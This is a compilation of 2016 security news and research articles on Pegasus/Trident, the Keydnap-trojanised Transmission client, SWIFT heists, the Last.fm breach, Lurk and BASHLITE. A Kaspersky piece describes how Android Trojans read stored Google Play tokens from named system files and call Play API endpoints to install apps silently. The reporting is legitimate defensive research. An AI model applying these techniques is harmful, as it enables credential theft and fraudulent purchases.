Pegasus exploit takes advantage of Trident bugs to remotely jailbreak and install a collection of spying software onto a victim's device, without the user’s knowledge.
One of the key tools of the exploit takes advantage of a memory corruption bug in Safari WebKit, allowing hackers to deliver the malicious payload when a target victim clicks on a malicious link and initiate the process of overtaking the operating system.
In an advisory, Apple warned that visiting a "maliciously crafted website" via Safari browser could allow attackers to execute arbitrary code on a victim's computer.
The patch updates that Apple released on Thursday fix the nasty Trident bugs, including CVE-2016-4654, CVE-2016-4655, and CVE-2016-4656, which were initially discovered and reported by mobile security startup Lookout and the University of Toronto’s Citizen Lab.
Based on a link sent to UAE human rights activist Ahmed Mansoor, Lookout Security, and Citizen Lab traced the three programming blunders and its Pegasus spyware kit to Israeli "cyber war" organization NSO Group, which sells hacking exploits to governments like the UAE.
Users can install security patches for Safari, El Capitan, and Yosemite via the usual software update mechanisms.

BitTorrent client Transmission found distributing Mac malware once again
2.9.2016 securityaffairs Virus

It has happened again, Mac users who were looking for the BitTorrent client Transmission might have been infected by the OSX/Keydnap malware.
Security experts from ESET have spotted the popular BitTorrent client called Transmission distributing Mac malware called OSX/Keydnap that is used to steal the content of OS X’s keychain and maintain a permanent backdoor on victims’PC. This is the second time that the BitTorrent client Transmission has been used to deliver a malicious code. In March the researchers from Palo Alto Networks Unit 42 discovered a malicious campaign reported by Apple customers who were looking for the latest version of Transmission that were infected with a new family of Ransomware that was specifically designed to target OS X installations.

“On March 4, we detected that the Transmission BitTorrent ailient installer for OS X was infected with ransomware, just a few hours after installers were initially posted. We have named this Ransomware “KeRanger.” states the report published by Palo Alto Networks.

The researchers named this new Ransomware family KeRanger, they also released a technical analysis of the malware.

Back to the present, researchers at ESET discovered that the Keydnap malware was spread through the official Transmission website.

“During the last hours, OSX/Keydnap was distributed on a trusted website, which turned out to be “something else”. It spread via a recompiled version of the otherwise legitimate open source BitTorrent client application Transmission and distributed on their official website.” reads the blog post published by ESET.

BitTorrent client Transmission malware

Transmission has promptly removed the malicious version from the download section, anyway, users who downloaded the client between Sunday and Monday should check if their machine has been comprised.

The Keydnap malware could be used by crooks to establish a backdoor on the compromised machine that can allow them to execute remote commands on the Mac.

Two attacks leveraging the BitTorrent client Transmission, is it a coincidence?

Malware researchers from ESET noted many similarities between the two attacks, for example in both cases the malicious code was added to the main function of the BitTorrent client Transmission. Also in this case, the OSX/Keydnap malicious code was signed with a legitimate code signing key that allows the crooks to bypass the Gatekeeper protection system.

“In both cases, a malicious block of code is added to the main function of the Transmission application,” ESET said. “The code responsible for dropping and running the malicious payload is astonishingly the same. Just like in the KeRanger case, a legitimate code signing key was used to sign the malicious Transmission application bundle. It’s different from the legitimate Transmission certificate, but is still signed by Apple and bypasses Gatekeeper protection.”

Experts speculate the Transmission website has been hacked, the attackers uploaded the malicious version of the BitTorrent client Transmission.ESET has notified Apple about the compromised developer certificate.

Experts from ESET has notified Apple about the compromised developer certificate.

SWIFT discloses more cyber attacks on its bank members and urges more security
2.9.2016 securityaffairs Security

SWIFT discloses more attacks against banks worldwide, pressures banks on security and urged member banks to implement the new SWIFT software by November 19.
In the last months, a worrisome string of attacks against banks worldwide through the SWIFT system has alarmed the banking industry. The so-called “SWIFT hackers” have conducted multiple cyber attacks against financial institutions. We reported the successful cyber heists on the Bangladesh bank, against a Ukrainian bank, and the Ecuadorian bank, meanwhile, a Vietnam bank reported to have blocked an ongoing cyber heist.

In May, a fourth Bank in the Philippines was a victim of the SWIFT hackers and the experts at Symantec confirmed the malware used by the crooks shares code with tools used by the notorious Lazarus group linked to the North Korean Government.

According to the Reuters agency, the SWIFT issued a new warning urging member banks to implement the new SWIFT software by 19 November.

The latest version of SWIFT’s software implements new security features specifically designed to defeat such kind of attacks.The authentication processes have been improved such as the implementation of mechanisms to early detect fraudulent activities.

“Customers’ environments have been compromised, and subsequent attempts (were) made to send fraudulent payment instructions. The threat is persistent, adaptive and sophisticated – and it is here to stay.” states the SWIFT.

The organization hasn’t provided further details on the alleged additional cyber attacks against banks worldwide.

“All the victims shared one thing in common,” says Reuters: “Weaknesses in local security that attackers exploited to compromise local networks and send fraudulent messages requesting money transfers.”

The SWIFT logo is pictured in this photo illustration taken April 26, 2016. REUTERS/Carlo Allegri/Illustration/File Photo

SWIFT told banks that it might report the incident to regulators and banking partners if they failed to adopt the new SWFT software.

Despite the efforts of the SWIFT, many experts speculate that the new security features are not enough to consider completely secure the banking systems.

Of course, the cyber attacks have prompted regulators globally to press financial institution to bolster their security defenses.

Roughly 43 Million Last.fm accounts were stolen in a 2012 security breach'
2.9.2016 securityaffairs Crime

According to the breach notification service LeakedSource roughly 43 million Last.fm accounts were compromised in a 2012 incident.
In June 2012, the online music service Last.fm was compromised by hackers, in response the company notified the incident to its users inviting them to change their passwords.

Some experts speculated the security breach took place several months earlier.

The company was using the MD5 hashing algorithm with no salt to protect passwords, which is known to be weak security implementation, for this reason, Last.fm also announced some improvements for the storage of the passwords.

“We are currently investigating the leak of some Last.fm user passwords. This follows recent password leaks on other sites, as well as information posted online. As a precautionary measure, we’re asking all our users to change their passwords immediately.” states the Last.fm Password Security Update.

“We strongly recommend that your new Last.fm password is different to the password you use on other services.”

The real number of impacted users was not disclosed at the time of the data breach, but now we know more about the incident. According to the breach notification service LeakedSource roughly 43 million accounts were compromised in the incident.

The leaked records include usernames, passwords, email addresses, dates of registration and some other internal data.

“Music service Last.fm was hacked on March 22nd, 2012 for a total of 43,570,999 users. This data set was provided to us by daykalif@xmpp.jp and Last.fm already knows about the breach but the data is just becoming public now like all the others.” reported LeakedSource.

“Each record contains a username, email address, password, join date, and some other internal data. We verified the legitimacy of this data set with Softpedia reporter Catalin C who was in the breach himself along with his colleagues.”

According to LeakedSource, its experts managed to crack 96 percent of the unsalted MD5 hashes within a couple of hours.

Below the top 10 passwords:

last.fm top passwords

The revelation about the Last.fm data breach arrives a couple of days after Dropbox confirmed that hackers stole 68 million accounts in 2012.

Unfortunately, the list of data breaches is very long and includes other IT giants, such as LinkedIn, MySpace, VK.com and Tumblr.

How Trojans manipulate Google Play
1.9.2016 Kaspersky Android
For malware writers, Google Play is the promised land of sorts. Once there, a malicious application gains access to a wide audience, gains the trust of that audience and experiences a degree of leniency from the security systems built into operating systems. On mobile devices, users typically cannot install applications coming from sources other than the official store, meaning this is a serious barrier for an app with malicious intent. However, it is far from easy for the app to get into Google Play: one of the main conditions for it is to pass a rigorous check for unwanted behavior by different analysis systems, both automatic and manual.

Some malware writers have given up on their efforts to push their malicious creations past security checks, and instead learned how to use the store’s client app for their unscrupulous gains. Lately, we have seen many Trojans use the Google Play app during promotion campaigns to download, install and launch apps on smartphones without the owners’ knowledge, as well as leave comments and rate apps. The apps installed by the Trojan do not typically cause direct damage to the user, but the victim may have to pay for the created excessive traffic. In addition, the Trojans may download and install paid apps as if they were free ones, further adding to the users’ bills.

Let us look into the methods how such manipulations with Google Play happen.

Level 1. N00b

The first method is to make the official Google Play app store undertake the actions the cybercriminal wants. The idea is to use the Trojan to launch the client, open the page of the required app in it, then search for and use special code to interact with the interface elements (buttons) to cause download, installation and launch of the application. The misused interface elements are outlined with red boxes in the screenshots below:

The exact methods of interaction with the interface vary. In general, the following techniques may be identified:

Use of the Accessibility services of the operating system (used by modules in Trojan.AndroidOS.Ztorg).
Imitation of user input (used by Trojan-Clicker.AndroidOS.Gopl.c).
Code injection into the process of Google Play client to modify its operation (used by Trojan.AndroidOS.Iop).
To see how such Trojans operate. Let us look at the example of Trojan.AndroidOS.Ztorg.n. This malicious program uses Accessibility services originally intended to create applications to help people with disabilities, such as GUI voice control apps. The Trojan receives a job from the command and control server (C&C) which contains a link to the required application, opens it in Google Play, and then launches the following code:


This code is needed to detect when the required interface element appears on the screen, and to emulate the click on it. This way, the following buttons are clicked in a sequence: “BUY” (the price is shown in the button), “ACCEPT” and “CONTINUE”. This is sufficient to purchase the app, if the user has a credit card with sufficient balance connected to his/her Google account.

Level 2. Pro

Some malware writers take roads less traveled. Instead of using the easy and reliable way described above, they create their own client for the app store using HTTPS API.

How Trojans manipulate Google Play

The difficult part about this approach is that the operation of the self-made client requires information (e.g. user credentials and authentication tokens) which is not available to a regular app. However, the cybercriminals are very fortunate that all required data are stored on the device in clear text, in the convenient SQLite format. Access to the data is limited by the Android security model, however apps may abuse it e.g. by rooting the device and thus gaining unlimited access.

For example, some versions of the Trojan.AndroidOS.Guerrilla.a have their own client for Google Play, which is distributed with the help of the rooter Leech. This client successfully fulfils the task of downloading and installing free and paid apps, and is capable of rating apps and leaving comments in the Google store.

After launch, Guerrilla starts to collect the following required information:

The credentials to the user’s Google Play account.

Activities in Google Play require special tokens that are generated when the user logs in. When the user is already logged in to Google Play, the Trojan can use the locally cached tokens. They can be located through a simple search through the database located at /data/system/users/0/accounts.db:

How Trojans manipulate Google Play

With the help of the code below, the Trojan checks if there are ready tokens on the infected device, i.e. if the user has logged on and can do activities in Google Play:

How Trojans manipulate Google Play

If no such tokens are available, the Trojan obtains the user’s username and hashed password, and authenticates via OAuth:

How Trojans manipulate Google Play

How Trojans manipulate Google Play

Android_id is the device’s unique ID.
Google Service Framework ID is the device’s identifier across Google services.

First, the Trojans attempts to obtain this ID using regular methods. If these fail for whatever reason, it executes the following code:

How Trojans manipulate Google Play
How Trojans manipulate Google Play

Google Advertising ID is the unique advertising ID provided by Google Play services.

Guerrilla obtains it as follows:

How Trojans manipulate Google Play

How Trojans manipulate Google Play

In a similar way, the Trojan obtains hashed data about the device from the file “/data/data/com.google.android.gms/shared_prefs/Checkin.xml“.

When the Trojan has collected the above data, it begins to receive tasks to download and install apps. Below is the structure of one such task:

How Trojans manipulate Google Play

The Trojan downloads the application by sending POST requests using the links below:

https://android.clients.google.com/fdfe/search: a search is undertaken for the request sent by the cybercriminals. This request is needed to simulate the user’s interaction with the Google Play client. (The main scenario of installing apps from the official client presupposes that the user first does the search request and only then visits the app’s page).
https://android.clients.google.com/fdfe/details: with this request, additional information needed to download the app is collected.
https://android.clients.google.com/fdfe/purchase: the token and purchase details are downloaded, used in the next request.
https://android.clients.google.com/fdfe/delivery: the Trojan receives the URL and the cookie-files required to download the Android application package (APK) file.
https://android.clients.google.com/fdfe/log: the download is confirmed (so the download counter is incremented.)
https://android.clients.google.com/fdfe/addReview: the app is rated and a comment is added.
When creating the requests, the cybercriminals attempted to simulate most accurately the equivalent requests sent by the official client. For example, the below set of HTTP headers is used in each request:

How Trojans manipulate Google Play

After the request is executed, the app may (optionally) get downloaded, installed (using the command ‘pm install -r’ which allows for installation of applications without the user’s consent) and launched.


The Trojans that use the Google Play app to download, install and launch apps from the store to a smartphone without the device owner’s consent are typically distributed by rooters – malicious programs which have already gained the highest possible privileges on the device. It is this particular fact that allows them to launch such attacks on the Google Play client app.

This type of malicious program pose a serious threat: in Q2 2016, different rooters occupied more than a half of the Top 20 of mobile malware. All the more so, rooters can download not only malicious programs that compromise the Android ecosystem and spend the user’s money on purchasing unnecessary paid apps, but other malware as well.

The Hunt for Lurk
1.9.2016 Kaspersky Virus
In early June, 2016, the Russian police arrested the alleged members of the criminal group known as Lurk. The police suspected Lurk of stealing nearly three billion rubles, using malicious software to systematically withdraw large sums of money from the accounts of commercial organizations, including banks. For Kaspersky Lab, these arrests marked the culmination of a six-year investigation by the company’s Computer Incidents Investigation team. We are pleased that the police authorities were able to put the wealth of information we accumulated to good use: to detain suspects and, most importantly, to put an end to the theft. We ourselves gained more knowledge from this investigation than from any other. This article is an attempt to share this experience with other experts, particularly the IT security specialists in companies and financial institutions that increasingly find themselves the targets of cyber-attacks.

When we first encountered Lurk, in 2011, it was a nameless Trojan. It all started when we became aware of a number of incidents at several Russian banks that had resulted in the theft of large sums of money from customers. To steal the money, the unknown criminals used a hidden malicious program that was able to interact automatically with the financial institution’s remote banking service (RBS) software; replacing bank details in payment orders generated by an accountant at the attacked organization, or even generating such orders by itself.

In 2016, it is hard to imagine banking software that does not demand some form of additional authentication, but things were different back in 2011. In most cases, the attackers only had to infect the computer on which the RBS software was installed in order to start stealing the cash. Russia’s banking system, like those of many other countries, was unprepared for such attacks, and cybercriminals were quick to exploit the security gap.

We participated in the investigation of several incidents involving the nameless malware, and sent samples to our malware analysts. They created a signature to see if any other infections involving it had been registered, and discovered something very unusual: our internal malware naming system insisted that what we were looking at was a Trojan that could be used for many things (spamming, for example) but not stealing money.

Our detection systems suggest that a program with a certain set of functions can sometimes be mistaken for something completely different. In the case of this particular program the cause was slightly different: an investigation revealed that it had been detected by a “common” signature because it was doing nothing that could lead the system to include it in any specific group, for example, that of banking Trojans.

Whatever the reason, the fact remained that the malicious program was used for the theft of money.

So we decided to take a closer look at the malware. The first attempts to understand how the program worked gave our analysts nothing. Regardless of whether it was launched on a virtual or a real machine, it behaved in the same way: it didn’t do anything. This is how the program, and later the group behind it, got its name. To “lurk” means to hide, generally with the intention of ambush.

We were soon able to help investigate another incident involving Lurk. This time we got a chance to explore the image of the attacked computer. There, in addition to the familiar malicious program, we found a .dll file with which the main executable file could interact. This was our first piece of evidence that Lurk had a modular structure.

Later discoveries suggest that, in 2011, Lurk was still at an early stage of development. It was formed of just two components, a number that would grow considerably over the coming years.

The additional file we uncovered did little to clarify the nature of Lurk. It was clear that it was a Trojan targeting RBS and that it was used in a relatively small number of incidents. In 2011, attacks on such systems were starting to grow in popularity. Other, similar, programs were already known about, the earliest detected as far back as in 2006, with new malware appearing regularly since then. These included ZeuS, SpyEye, and Carberp, etc. In this series, Lurk represented yet another dangerous piece of malware.

It was extremely difficult to make Lurk work in a lab environment. New versions of the program appeared only rarely, so we had few opportunities to investigate new incidents involving Lurk. A combination of these factors influenced our decision to postpone our active investigation into this program and turn our attention to more urgent tasks.

A change of leader

For about a year after we first met Lurk, we heard little about it. It later turned out that the incidents involving this malicious program were buried in the huge amount of similar incidents involving other malware. In May 2011, the source code of ZeuS had been published on the Web and this resulted in the emergence of many program modifications developed by small groups of cybercriminals.

In addition to ZeuS, there were a number of other unique financial malware programs. In Russia, there were several relatively large cybercriminal groups engaged in financial theft via attacks on RBS. Carberp was the most active among them. At the end of March 2012, the majority of its members were arrested by the police. This event significantly affected the Russian cybercriminal world as the gang had stolen hundreds of millions of rubles during a few years of activity, and was considered a “leader” among cybercriminals. However, by the time of the arrests, Carberp’s reputation as a major player was already waning. There was a new challenger for the crown.

A few weeks before the arrests, the sites of a number of major Russian media, such as the agency “RIA Novosti”, Gazeta.ru and others, had been subjected to a watering hole attack. The unknown cybercriminals behind this attack distributed their malware by exploiting a vulnerability in the websites’ banner exchange system. A visitor to the site would be redirected to a fraudulent page containing a Java exploit. Successful exploitation of the vulnerability initiated the launch of a malicious program whose main function was collecting information on the attacked computer, sending it to a malicious server, and in some cases receiving and installing an extra load from the server.

The Hunt for Lurk

The code on the main page of RIA.ru that is used to download additional content from AdFox.ru

From a technical perspective, the malicious program was unusual. Unlike most other malware, it left no traces on the hard drive of the system attacked and worked only in the RAM of the machine. This approach is not often used in malware, primarily because the resulting infection is “short-lived”: malware exists in the system only until the computer is restarted, at which point the process of infection need to be started anew. But, in the case of these attacks, the secret “bodiless” malicious program did not have to gain a foothold in the victim’s system. Its primary job was to explore; its secondary role was to download and install additional malware. Another fascinating detail was the fact that the malware was only downloaded in a small number of cases, when the victim computer turned out to be “interesting”.

The Hunt for Lurk

Part of the Lurk code responsible for downloading additional modules

Analysis of the bodiless malicious program showed that it was “interested” in computers with remote banking software installed. More specifically, RBS software created by Russian developers. Much later we learned that this unnamed, bodiless module was a mini, one of the malicious programs which used Lurk. But at the time we were not sure whether the Lurk we had known since 2011, and the Lurk discovered in 2012, were created by the same people. We had two hypotheses: either Lurk was a program written for sale, and both the 2011 and 2012 versions were the result of the activity of two different groups, which had each bought the program from the author; or the 2012 version was a modification of the previously known Trojan.

The second hypothesis turned out to be correct.

Invisible war with banking software

A small digression. Remote banking systems consist of two main parts: the bank and the client. The client part is a small program that allows the user (usually an accountant) to remotely manage their organization’s accounts. There are only a few developers of such software in Russia, so any Russian organization that uses RBS relies on software developed by one of these companies. For cybercriminal groups specializing in attacks on RBS, this limited range of options plays straight into their hands.

In April 2013, a year after we found the “bodiless” Lurk module, the Russian cybercriminal underground exploited several families of malicious software that specialized in attacks on banking software. Almost all operated in a similar way: during the exploration stage they found out whether the attacked computer had the necessary banking software installed. If it did, the malware downloaded additional modules, including ones allowing for the automatic creation of unauthorized payment orders, changing details in legal payment orders, etc. This level of automation became possible because the cybercriminals had thoroughly studied how the banking software operated and “tailored” their malicious software modules to a specific banking solution.

The people behind the creation and distribution of Lurk had done exactly the same: studying the client component of the banking software and modifying their malware accordingly. In fact, they created an illegal add-on to the legal RBS product.

Through the information exchanges used by people in the security industry, we learned that several Russian banks were struggling with malicious programs created specifically to attack a particular type of legal banking software. Some of them were having to release weekly patches to customers. These updates would fix the immediate security problems, but the mysterious hackers “on the other side” would quickly release a new version of malware that bypassed the upgraded protection created by the authors of the banking programs.

It should be understood that this type of work – reverse-engineering a professional banking product – cannot easily be undertaken by an amateur hacker. In addition, the task is tedious and time-consuming and not the kind to be performed with great enthusiasm. It would need a team of specialists. But who in their right mind would openly take up illegal work, and who might have the money to finance such activities? In trying to answer these questions, we eventually came to the conclusion that every version of Lurk probably had an organized group of cybersecurity specialists behind it.

The relative lull of 2011-2012 was followed by a steady increase in notifications of Lurk-based incidents resulting in the theft of money. Due to the fact that affected organizations turned to us for help, we were able to collect ever more information about the malware. By the end of 2013, the information obtained from studying hard drive images of attacked computers as well as data available from public sources, enabled us to build a rough picture of a group of Internet users who appeared to be associated with Lurk.

This was not an easy task. The people behind Lurk were pretty good at anonymizing their activity on the network. For example, they were actively using encryption in everyday communication, as well as false data for domain registration, services for anonymous registration, etc. In other words, it was not as easy as simply looking someone up on “Vkontakte” or Facebook using the name from Whois, which can happen with other, less professional groups of cybercriminals, such as Koobface. The Lurk gang did not make such blunders. Yet mistakes, seemingly insignificant and rare, still occurred. And when they did, we caught them.

Not wishing to give away free lessons in how to run a conspiracy, I will not provide examples of these mistakes, but their analysis allowed us to build a pretty clear picture of the key characteristics of the gang. We realized that we were dealing with a group of about 15 people (although by the time it was shut down, the number of “regular” members had risen to 40). This team provided the so-called “full cycle” of malware development, delivery and monetization – rather like a small, software development company. At that time the “company” had two key “products”: the malicious program, Lurk, and a huge botnet of computers infected with it. The malicious program had its own team of developers, responsible for developing new functions, searching for ways to “interact” with RBS systems, providing stable performance and fulfilling other tasks. They were supported by a team of testers who checked the program performance in different environments. The botnet also had its own team (administrators, operators, money flow manager, and other partners working with the bots via the administration panel) who ensured the operation of the command and control (C&C) servers and protected them from detection and interception.

Developing and maintaining this class of malicious software requires professionals and the leaders of the group hunted for them on job search sites. Examples of such vacancies are covered in my article about Russian financial cybercrime. The description of the vacancy did not mention the illegality of the work on offer. At the interview, the “employer” would question candidates about their moral principles: applicants were told what kind of work they would be expected to do, and why. Those who agreed got in.

The Hunt for Lurk

A fraudster has advertised a job vacancy for java / flash specialists on a popular Ukrainian website. The job requirements include a good level of programming skills in Java, Flash, knowledge of JVM / AVM specifications, and others. The organizer offers remote work and full employment with a salary of $2,500.

So, every morning, from Monday to Friday, people in different parts of Russia and Ukraine sat down in front of their computer and started to “work”. The programmers “tuned” the functions of malware modifications, after which the testers carried out the necessary tests on the quality of the new product. Then the team responsible for the botnet and for the operation of the malware modules and components uploaded the new version onto the command server, and the malicious software on botnet computers was automatically updated. They also studied information sent from infected computers to find out whether they had access to RBS, how much money was deposited in clients’ accounts, etc.

The money flow manager, responsible for transferring the stolen money into the accounts of money mules, would press the button on the botnet control panel and send hundreds of thousands of rubles to accounts that the “drop project” managers had prepared in advance. In many cases they didn’t even need to press the button: the malicious program substituted the details of the payment order generated by the accountant, and the money went directly to the accounts of the cybercriminals and on to the bank cards of the money mules, who cashed it via ATMs, handed it over to the money mule manager who, in turn, delivered it to the head of the organization. The head would then allocate the money according to the needs of the organization: paying a “salary” to the employees and a share to associates, funding the maintenance of the expensive network infrastructure, and of course, satisfying their own needs. This cycle was repeated several times.


Each member of the typical criminal group has their own responsibilities.

These were the golden years for Lurk. The shortcomings in RBS transaction protection meant that stealing money from a victim organization through an accountant’s infected machine did not require any special skills and could even be automated. But all “good things” must come to an end.

The end of “auto money flow” and the beginning of hard times

The explosive growth of thefts committed by Lurk and other cybercriminal groups forced banks, their IT security teams and banking software developers to respond.

First of all, the developers of RBS software blocked public access to their products. Before the appearance of financial cybercriminal gangs, any user could download a demo version of the program from the manufacturer’s website. Attackers used this to study the features of banking software in order to create ever more tailored malicious programs for it. Finally, after many months of “invisible war” with cybercriminals, the majority of RBS software vendors succeeded in perfecting the security of their products.

At the same time, the banks started to implement dedicated technologies to counter the so-called “auto money flow”, the procedure which allowed the attackers to use malware to modify the payment order and steal money automatically.

By the end of 2013, we had thoroughly explored the activity of Lurk and collected considerable information about the malware. At our farm of bots, we could finally launch a consistently functioning malicious script, which allowed us to learn about all the modifications cybercriminals had introduced into the latest versions of the program. Our team of analysts had also made progress: by the year’s end we had a clear insight into how the malware worked, what it comprised and what optional modules it had in its arsenal.

Most of this information came from the analysis of incidents caused by Lurk-based attacks. We were simultaneously providing technical consultancy to the law enforcement agencies investigating the activities of this gang.

It was clear that the cybercriminals were trying to counteract the changes introduced in banking and IT security. For example, once the banking software vendors stopped providing demo versions of their programs for public access, the members of the criminal group established a shell company to receive directly any updated versions of the RBS software.

Thefts declined as a result of improvements in the security of banking software, and the “auto money flow” became less effective. As far as we can judge from the data we have, in 2014 the criminal group behind Lurk seriously reduced its activity and “lived from hand to mouth”, attacking anyone they could, including ordinary users. Even if the attack could bring in no more than a few tens of thousands of rubles, they would still descend to it.

In our opinion, this was caused by economic factors: by that time, the criminal group had an extensive and extremely costly network infrastructure, so, in addition to employees’ salaries, it was necessary to pay for renting servers, VPN and other technical tools. Our estimates suggest that the network infrastructure alone cost the Lurk managers tens of thousands of dollars per month.

Attempts to come back

In addition to increasing the number of “minor” attacks, the cybercriminals were trying to solve their cash flow problem by “diversifying” the business and expanding their field of activity. This included developing, maintaining and renting the Angler exploit pack (also known as XXX). Initially, this was used mainly to deliver Lurk to victims’ computers. But as the number of successful attacks started to decline, the owners began to offer smaller groups paid access to the tools.

By the way, judging by what we saw on Russian underground forums for cybercriminals, the Lurk gang had an almost legendary status. Even though many small and medium-sized groups were willing to “work” with them, they always preferred to work by themselves. So when Lurk provided other cybercriminals with access to Angler, the exploit pack became especially popular – a “product” from the top underground authority did not need advertising. In addition, the exploit pack was actually very effective, delivering a very high percentage of successful vulnerability exploitations. It didn’t take long for it to become one of the key tools on the criminal2criminal market.

As for extending the field of activity, the Lurk gang decided to focus on the customers of major Russian banks and the banks themselves, whereas previously they had chosen smaller targets.

In the second half of 2014, we spotted familiar pseudonyms of Internet users on underground forums inviting specialists to cooperate on document fraud. Early the following year, several Russian cities were swamped with announcements about fraudsters who used fake letters of attorney to re-issue SIM cards without their owners being aware of it.

The purpose of this activity was to gain access to one-time passwords sent by the bank to the user so that they could confirm their financial transaction in the online or remote banking system. The attackers exploited the fact that, in remote areas, mobile operators did not always carefully check the authenticity of the documents submitted and released new SIM cards at the request of cybercriminals. Lurk would infect a computer, collect its owner’s personal data, generate a fake letter of attorney with the help of “partners” from forums and then request a new SIM card from the network operator.

Once the cybercriminals received a new SIM card, they immediately withdrew all the money from the victim’s account and disappeared.

Although initially this scheme yielded good returns, this didn’t last long, since by then many banks had already implemented protection mechanisms to track changes in the unique SIM card number. In addition, the SIM card-based campaign forced some members of the group and their partners out into the open and this helped law enforcement agencies to find and identify suspects.

Alongside the attempts to “diversify” the business and find new cracks in the defenses of financial businesses, Lurk continued to regularly perform “minor thefts” using the proven method of auto money flow. However, the cybercriminals were already planning to earn their main money elsewise.

New “specialists”

In February 2015, Kaspersky Lab’s Global Research and Analysis Team (GReAT) released its research into the Carbanak campaign targeting financial institutions. Carbanak’s key feature, which distinguished it from “classical” financial cybercriminals, was the participation of professionals in the Carbanak team, providing deep knowledge of the target bank’s IT infrastructure, its daily routine and the employees who had access to the software used to conduct financial transactions. Before any attack, Carbanak carefully studied the target, searched for weak points and then, at a certain moment in time, committed the theft in no more than a few hours. As it turned out, Carbanak was not the only group applying this method of attack. In 2015, the Lurk team hired similar experts.


How the Carbanak group operated.

We realized this when we found incidents that resembled Carbanak in style, but did not use any of its tools. This was Lurk. The Lurk malware was used as a reliable “back door” to the infrastructure of the attacked organization rather than as a tool to steal money. Although the functionality that had previously allowed for the near-automatic theft of millions no longer worked, in terms of its secrecy Lurk was still an extremely dangerous and professionally developed piece of malware.

However, despite its attempts to develop new types of attacks, Lurk’s days were numbered. Thefts continued until the spring of 2016. But, either because of an unshakable confidence in their own impunity or because of apathy, day-by-day the cybercriminals were paying less attention to the anonymity of their actions. They became especially careless when cashing money: according to our incident analysis, during the last stage of their activity, the cybercriminals used just a few shell companies to deposit the stolen money. But none of that mattered any more as both we and the police had collected enough material to arrest suspected group members, which happened early in June this year.

No one on the Internet knows you are a cybercriminal?

My personal experience of the Lurk investigation made me think that the members of this group were convinced they would never be caught. They had grounds to be that presumptuous: they were very thorough in concealing the traces of their illegal activity, and generally tried to plan the details of their actions with care. However, like all people, they made mistakes. These errors accumulated over the years and eventually made it possible to put a stop to their activity. In other words, although it is easier to hide evidence on the Internet, some traces cannot be hidden, and eventually a professional team of investigators will find a way to read and understand them.

Lurk is neither the first nor the last example to prove this. The infamous banking Trojan SpyEye was used to steal money between 2009 and 2011. Its alleged creator was arrested 2013, and convicted in 2014.

The first attacks involving the banking Trojan Carberp began in 2010; the members of the group suspected of creating and distributing this Trojan were arrested in 2012 and convicted in 2014. The list goes on.

The history of these and other cybercriminal groups spans the time when everyone (and members of the groups in particular) believed that they were invulnerable and the police could do nothing. The results have proved them wrong.

Unfortunately, Lurk is not the last group of cybercriminals attacking companies for financial gain. We know about some other groups targeting organizations in Russia and abroad. For these reasons, we recommend that all organizations do the following:

If your organization was attacked by hackers, immediately call the police and involve experts in digital forensics. The earlier you apply to the police, the more evidence the forensics will able to collect, and the more information the law enforcement officers will have to catch the criminals.
Apply strict IT security policies on terminals from which financial transactions are made and for employees working with them.
Teach all employees who have access to the corporate network the rules of safe online behavior.
Compliance with these rules will not completely eliminate the risk of financial attacks but will make it harder for fraudsters and significantly increase the probability of their making a mistake while trying to overcome these difficulties. And this will help law enforcement agencies and IT security experts in their work.

P.S.: why does it take so long?

Law enforcement agencies and IT security experts are often accused of inactivity, allowing hackers to remain at large and evade punishment despite the enormous damage caused to the victims.

The story of Lurk proves the opposite. In addition, it gives some idea of the amount of work that has to be done to obtain enough evidence to arrest and prosecute suspects. Unfortunately, the rules of the “game” are not the same for all participants: the Lurk group used a professional approach to organizing a cybercriminal enterprise, but, for obvious reasons, did not find it necessary to abide by the law. As we work with law enforcement, we must respect the law. This can be a long process, primarily because of the large number of “paper” procedures and restrictions that the law imposes on the types of information we as a commercial organization can work with.

Our cooperation with law enforcement in investigating the activity of this group can be described as a multi-stage data exchange. We provided the intermediate results of our work to the police officers; they studied them to understand if the results of our investigation matched the results of their research. Then we got back our data “enriched” with the information from the law enforcement agencies. Of course, it was not all the information they could find; but it was the part which, by law, we had the right to work with. This process was repeated many times until we finally we got a complete picture of Lurk activity. However, that was not the end of the case.

A large part of our work with law enforcement agencies was devoted to “translating” the information we could get from “technical” into “legal” language. This ensured that the results of our investigation could be described in such a way that they were clear to the judge. This is a complicated and laborious process, but it is the only way to bring to justice the perpetrators of cybercrimes.

BASHLITE Botnets peaked 1 Million Internet of Thing Devices
1.9.2016 securityaffeirs BotNet

A joint research conducted by Level 3 Communications and Flashpoint allowed the identification of a million devices infected by the BASHLITE malware.
Do you remember the BASHLITE malware? It was a strain of malware (also known as Lizkebab, Torlus and Gafgyt) detected by experts at Trend Micro shortly after the public disclosure of the ShellShock bug.

The BASHLITE malware includes the code of the ShellShock exploit and it had been used by threat actors in the wild to run distributed denial-of-service (DDoS) attacks.

It could infect multiple Linux architectures, for this reason, crooks used it to target Internet of Things devices.

In June, experts from the security firm Sucuri spotted a botnet composed of tens of thousands of CCTV devices that had been used by crooks to launch DDoS attacks against websites.

The BASHLITE source code was leaked online in early 2015, malware developers used it to create their own variant.

Now experts from Level 3 and Flashpoint confirmed the overall number of devices infected by the BASHLITE malware is more than 1 million.

The number includes compromised devices belonging to several botnets, according to the experts, almost every infected device are digital video recorders (DVRs) or cameras (95%), the remaining is composed of routers (4%), and Linux servers (1%).

“Of the identifiable devices participating in these botnets, almost 96 percent were IoT devices (of which 95 percent were cameras and DVRs), roughly 4 percent were home routers and less than 1 percent were compromised Linux servers. This represents a drastic shift in the composition of botnets compared to the compromised server- and home router-based DDoS botnets we’ve seen in the past.” states a blog post published by Level 3 firm.

The researchers have been tracking more than 200 C&C worldwide used by the BASHLITE botnets. Fortunately, the IP addresses of the C&C servers was found hardcoded in the instance of malware detected in the wild making easy for experts to shut down them.

The researchers provided interesting details about the Global Distribution of the gafgyt Bots, the vast majority of infected devices are located in Brazil, Taiwan and Colombia.

“Of the bots we’ve observed participating in attacks, peaking at more than 1 million devices, a large percentage are located in Taiwan, Brazil and Colombia. A large majority of these bots were using white-labeled DVRs generically described as “H.264 DVRs” and DVRs manufactured by the company Dahua Technology.” continues the post. “We have contacted Dahua Technology to make them aware of this issue. Our investigation shows more than one million of these two types of devices are accessible on the internet, providing a large pool of potential bots.”


It is quite easy for hackers to compromise DVRs that are affected by multiple critical vulnerabilities. In many cases, the same flawed software is used by multiple vendors for their devices.

“Most of these devices run some flavor of embedded Linux. When combined with the bandwidth required to stream video, they provide a potent class of DDoS bots,” continues the post.

According to the experts, crooks behind the botnets have used some of the C&C servers to launch more than 100 attacks per day.

